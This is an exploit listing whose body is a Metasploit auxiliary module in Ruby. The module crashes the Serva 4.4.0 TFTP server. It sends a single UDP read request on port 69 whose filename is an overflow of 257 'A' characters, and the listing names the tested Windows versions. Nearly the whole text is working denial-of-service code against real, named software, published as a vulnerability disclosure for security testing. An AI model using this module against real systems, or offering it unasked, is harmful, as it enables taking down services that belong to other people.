# Exploit Title: Serva 4.4.0 TFTP Server Remote Buffer Overflow (Metasploit)
# Date: 2021-11-23
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://www.vercot.com/
# Software Link : https://www.vercot.com/~serva/download/Serva_Community_v4.4.0-21081411.zip
# Tested Version: 4.4.0
# Tested on: Windows XP SP3 -  Windows 7 Professional x86 SP1 - Windows 10 x64

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos
  Rank = ExcellentRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Serva 4.4.0 TFTP Remote Buffer Overflow',
      'Description'    => %q{
        The Serva TFTP server version 4.4.0 can be
        brought down by sending a special Read request.
      },
      'Author'         => 'Yehia Elghaly',
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2021-11-23'))

    register_options([Opt::RPORT(69)])
  end

  def run
    connect_udp
    print_status("Sending Read request...")
    sploit  = "\x00\x01"
    sploit += "A" * 257
    sploit += "\x00"
    sploit += "netascii"
    sploit += "\x00"
    udp_sock.put(sploit)
    disconnect_udp
  end
end